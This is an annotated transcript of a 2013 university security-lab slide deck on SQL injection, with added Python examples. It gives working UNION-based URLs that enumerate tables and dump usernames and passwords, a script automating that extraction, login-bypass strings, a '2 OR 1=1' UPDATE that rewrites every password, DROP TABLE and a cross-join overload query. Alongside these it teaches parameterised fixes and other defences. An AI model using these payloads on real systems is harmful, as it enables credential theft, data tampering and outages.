This document discusses SQL injection, including what it is, how it works, and how to perform SQL injection attacks to extract information from a database and alter data. It provides examples of SQL queries that can be used to find the number of columns in a table, determine table and column names, and extract or alter data. The document notes that proper input validation and use of prepared statements are needed to prevent SQL injection attacks, and that no single solution can fully prevent SQL injection.
Overview of SQL injection, why it matters, and how to prevent it.
Introduction to SQL, its role in dynamic web sites, and what SQL injection is.
How SQL injection arrives through user-interface forms and URL parameters.
Using INFORMATION_SCHEMA to find table and column names through an injection point.
Extracting and altering user records through SQL injection.
Performance impact of injected queries (for example, runaway joins) and destructive commands such as DROP TABLE.
How a login check built by string concatenation is bypassed, and why security is the developer's responsibility.
Prevention techniques: consistent error handling, locked-down database privileges, and secure coding practices.
Limits of database firewalls, stored procedures and other partial fixes, and why NoSQL databases are not immune either.
Security Lab, University Putra Malaysia
23 May 2013
Sina Manavi
Contact: http://sinamanavi.blogspot.com/p/about-me.html
2.
• Introduction
• Why SQL injection
• What is needed for this
• What you can do with SQL injection
• What are its pros and cons
• Why we need to know about it, and how we can protect our database from SQL injection attacks
3.
We are all familiar with the SQL language
One of the technologies that helped convert the static web into a dynamic one
SQL is relatively easy to read, a little more difficult to write
Runs on database servers such as MySQL and Microsoft SQL Server, typically behind a web server such as Apache
SQL injection means manipulating an application's SQL queries, and through them its tables, without authorization
5.
SQL injection typically arrives in one of two forms, UI based or URL based (any other input that reaches a query, such as a cookie or an HTTP header, works the same way):
◦ (1) Injecting into a form, such as the username and password boxes on a login page.
◦ (2) Injecting into a URL, like http://yourtarget.com/products/list.php?pid=10
6.
Simple example:
SELECT ID FROM tbl_users
◦ WHERE ID='Uid' AND pass='pass'
◦ If it returns any row, the application treats the supplied credentials as correct
INFORMATION_SCHEMA holds the names of every table and column on the database server, and its own name never changes (it is part of the SQL standard and exists on MySQL, SQL Server and PostgreSQL, among others; a database user sees only the objects it has privileges on).
◦ Table holding all the table names: INFORMATION_SCHEMA.TABLES
◦ Table holding all the column names: INFORMATION_SCHEMA.COLUMNS
9.
Finding the column count:
◦ www.yourtarget.com/list.php?ID=10+ORDER+BY+1--
Increase the 1 until you get an error; the last number that worked is the number of columns in the page's query.
Finding table names:
◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES--
ID=-1 makes the page's own SELECT return nothing, so the row shown comes from the injected SELECT; the injected SELECT must have the same number of columns as found in the previous step (3 here). The page then shows, for example:
tbl_user
10.
Now it's time to find the column names:
www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='tbl_user'--
Because the page renders only one row, step through the columns one at a time by asking for names after the one already displayed:
www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='tbl_user'+AND+column_name>'displayed_column'--
Repeat, replacing displayed_column with the last name shown, until you have them all; here the result is:
id, username, password
Keep going until you reach the columns you are after (e.g. username, password, or login)
11.
And finally it's time to read the records:
◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,username,3+FROM+tbl_user--
And
◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,password,3+FROM+tbl_user--
◦ Username=admin, password=123456
◦ Not a wise choice of password, admin ;)
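The whole procedure from slides 9 to 11, column counting with ORDER BY, table and column discovery, and record extraction one row at a time, as an added example that is not part of the original slides. It uses Python's sqlite3 as a stand-in for the target's database; the table contents, the list_page() function standing in for list.php, and the use of sqlite_master and pragma_table_info() in place of INFORMATION_SCHEMA (which SQLite does not have) are all assumptions of this example, not facts from the deck.

```python
import sqlite3

# Constructed stand-in for the target site's database (hypothetical data,
# not from the slides). SQLite has no INFORMATION_SCHEMA, so the example
# reads sqlite_master and pragma_table_info() instead; the injection
# mechanics are identical.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (pid INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (10, 'widget', '9.99');
        CREATE TABLE tbl_user (id INTEGER, username TEXT, password TEXT);
        INSERT INTO tbl_user VALUES (1, 'admin', '123456');
        INSERT INTO tbl_user VALUES (2, 'bob', 'hunter2');
    """)
    return con

def list_page(con, id_param):
    """Stand-in for list.php?ID=...: the parameter is pasted into the SQL
    text and only the first result row is rendered, as on the slides."""
    sql = "SELECT pid, name, price FROM products WHERE pid=" + id_param
    return con.execute(sql).fetchone()      # None when nothing is shown

def find_column_count(con, max_cols=20):
    """Slide 9: ORDER BY n succeeds until n exceeds the column count,
    and the database error is what tells the attacker to stop."""
    for n in range(1, max_cols + 1):
        try:
            list_page(con, f"10 ORDER BY {n}--")
        except sqlite3.OperationalError:    # "ORDER BY term out of range"
            return n - 1
    return None                             # more columns than probed

def enumerate_column(con, expr, from_clause):
    """Slides 9-11: pull every value of `expr` through the UNION, one row
    per request. Because the page shows only one row, each request asks
    for the smallest value greater than the last one seen (the slides'
    column_name > 'displayed_column' trick). `from_clause` must already
    contain a WHERE so the extra condition can be ANDed on."""
    values, last = [], ""
    while True:
        payload = (f"-1 UNION SELECT 1,MIN({expr}),3 FROM {from_clause} "
                   f"AND {expr}>'{last}'--")
        row = list_page(con, payload)
        if row is None or row[1] is None:   # MIN() over no rows -> NULL
            return values
        values.append(row[1])
        last = row[1]

if __name__ == "__main__":
    db = build_db()
    print("columns:", find_column_count(db))
    print("tables:", enumerate_column(db, "name", "sqlite_master WHERE type='table'"))
    print("tbl_user columns:",
          enumerate_column(db, "name", "pragma_table_info('tbl_user') WHERE 1=1"))
    print("records:",
          enumerate_column(db, "username||':'||password", "tbl_user WHERE 1=1"))
```

Two practical points the slides gloss over: the UNION works only because ID=-1 empties the page's own result set and the injected SELECT has exactly the column count found first, and the whole extraction is driven by what the page renders, so a page that shows one row still leaks everything, just one request per value.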
12.
Now we can alter the records as well, let's rock. A password-change query built by string interpolation looks like:
UPDATE tbl_user
SET password = SHA2('$password', 256)
WHERE id = $id
If $id is pasted in unquoted, an attacker-controlled id such as 2 OR 1=1 rewrites every user's password, no quote character needed. Or we can insert a new user with an INSERT command.
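The record-altering case above, as an added example that is not part of the original slides: the same UPDATE built by interpolating $id, run once with a normal id and once with an injected one, beside a version that validates the id and binds both values. Python's sqlite3 stands in for MySQL, the tbl_user rows are constructed, and the password values are placeholders because SQLite has no SHA2(); all of that is assumed for the example.

```python
import sqlite3

def build_db():
    """Constructed stand-in for tbl_user (hypothetical rows, not from the
    slides). Passwords are placeholders; SQLite has no SHA2()."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE tbl_user (id INTEGER, username TEXT, password TEXT);
        INSERT INTO tbl_user VALUES (1, 'admin', 'h1');
        INSERT INTO tbl_user VALUES (2, 'bob',   'h2');
        INSERT INTO tbl_user VALUES (3, 'eve',   'h3');
    """)
    return con

def snapshot(con):
    """(id, password) for every row, so the effect of an UPDATE is visible."""
    return con.execute("SELECT id, password FROM tbl_user ORDER BY id").fetchall()

def change_password_vulnerable(con, user_id, new_password):
    """Slide 12's UPDATE with $id pasted into the SQL text. Because the id
    is numeric and unquoted, no quote character is needed to inject:
    user_id = "2 OR 1=1" turns the WHERE into a match-everything."""
    sql = f"UPDATE tbl_user SET password='{new_password}' WHERE id = {user_id}"
    con.execute(sql)
    return snapshot(con)

def change_password_safe(con, user_id, new_password):
    """Validate the id as an integer, then bind both values as parameters
    so neither can change the statement. Returns None for a non-integer
    id; the caller should treat that as a bad request, not fall back."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return None
    con.execute("UPDATE tbl_user SET password = ? WHERE id = ?",
                (new_password, uid))
    return snapshot(con)

if __name__ == "__main__":
    print(change_password_vulnerable(build_db(), "2", "new"))
    print(change_password_vulnerable(build_db(), "2 OR 1=1", "pwned"))
    print(change_password_safe(build_db(), "2 OR 1=1", "pwned"))
```

The int() check and the bound parameter are independent defences: the parameter alone already keeps "2 OR 1=1" out of the SQL (it is compared as a value and matches nothing), while the type check makes the failure explicit instead of silently updating zero rows.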
13.
If user_list contains 1000 records, then a query like the following sets the database on fire:
SELECT * FROM user_list a JOIN user_list b
JOIN user_list c JOIN user_list d JOIN user_list e
JOIN user_list f
A six-way self-join with no join condition is a cross product of 1000^6 rows, so an injected statement can be a denial of service even when it reads or changes nothing.
14.
Where the database lets the injected text run as a further statement, the attacker can also insert a new user into tbl_user, or the malicious code can simply be:
DROP TABLE tbl_user
15.
How it works
SELECT * FROM tbl_users
WHERE id='Fname' AND pass='pass'
Malicious input in the id field, such as  Fname' or '1'='1' --  (the comment marker, -- followed by a space, or # in MySQL, discards the password check), turns this into:
SELECT * FROM tbl_users WHERE id='Fname' or '1'='1';
if(mysql_num_rows($result))
//do login
Since '1'='1' is always true, the query returns rows, and the unauthorized user gets in easily, bypassing authentication. Putting  ' or '1'='1  in the password field works too and needs no comment, because the OR then covers the whole condition.
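The login check from slides 6 and 15 beside its parameterised fix, as an added example that is not part of the original slides. Python's sqlite3 stands in for the PHP/MySQL code on the slide, the tbl_users row is constructed, and the two payload strings are the ones discussed above; everything else is an assumption of this example.

```python
import sqlite3

def build_db():
    """Constructed stand-in for tbl_users (hypothetical credentials)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE tbl_users (id TEXT, pass TEXT);
        INSERT INTO tbl_users VALUES ('alice', 's3cret');
    """)
    return con

def login_vulnerable(con, uid, pw):
    """Slide 15's check: the query is assembled by string concatenation,
    so the user's text becomes SQL. Returns True when at least one row
    comes back, like if(mysql_num_rows($result)) on the slide."""
    sql = f"SELECT * FROM tbl_users WHERE id='{uid}' AND pass='{pw}'"
    return con.execute(sql).fetchone() is not None

def login_safe(con, uid, pw):
    """The same check with bound parameters: the driver sends the values
    separately from the SQL text, so quotes in the input are just data."""
    sql = "SELECT * FROM tbl_users WHERE id=? AND pass=?"
    return con.execute(sql, (uid, pw)).fetchone() is not None

# Injected inputs. The username variant ends with a comment marker so the
# AND pass='' part is discarded, giving exactly the query on slide 15.
# A bare  ' or '1'='1  in the username alone would NOT bypass, because
# AND binds tighter than OR, so pass='' would still have to hold.
UID_PAYLOAD = "Fname' or '1'='1' -- "
PW_PAYLOAD = "' or '1'='1"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable, username payload:", login_vulnerable(db, UID_PAYLOAD, ""))
    print("vulnerable, password payload:", login_vulnerable(db, "Fname", PW_PAYLOAD))
    print("safe, username payload:      ", login_safe(db, UID_PAYLOAD, ""))
    print("safe, real credentials:      ", login_safe(db, "alice", "s3cret"))
```

The operator-precedence detail is worth remembering on both sides: it is why a naive payload sometimes "does not work" during testing, and why a real check should never rely on that accident instead of on parameters.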
16.
Security is the developer's job
No database, connector, or framework
can prevent SQL injection all the time
17.
• Implement proper error handling: return a single generic error message for all failures, so database errors (which reveal column counts and table names, as in the ORDER BY step above) never reach the user.
• Lock down the database configuration: give the application its own user with only the privileges it needs, and specify users, roles and permissions explicitly.
• Never splice user input into SQL text; bind it as a parameter. If a value must be inlined, prefix and append a quote and escape it, even if the data is numeric, so that 10 cannot become 10 OR 1=1.
Vipin Samar, Oracle vice president of Database Security:
"Database Firewall is a good first layer of defense for databases but it won't protect you from everything,"
20.
Using stored procedures:
CREATE PROCEDURE SP_show_user(IN U_ID INT)
BEGIN
SELECT * FROM Bugs WHERE User_ID = U_ID;
END
CALL SP_show_user(54)
"Might be helpful but still vulnerable": the body is safe because U_ID is a typed parameter, but an application that builds the CALL statement by string concatenation ("CALL SP_show_user(" . $id . ")") is injectable exactly as before, and a procedure that assembles dynamic SQL internally (PREPARE ... FROM CONCAT(...)) moves the problem inside the database rather than removing it.
21.
Common myths, each of which is false:
• I don't have to worry anymore
• Escaping is the fix
• More escaping is better
• I can code an escaping function
• Only user input is unsafe
• Stored procs are the fix
• SQL privileges are the fix
• My app doesn't need security
• Frameworks are the fix
• Parameters quote for you
• Parameters are the fix
• Parameters make queries slow
• SQL proxies are the fix
• NoSQL databases are the fix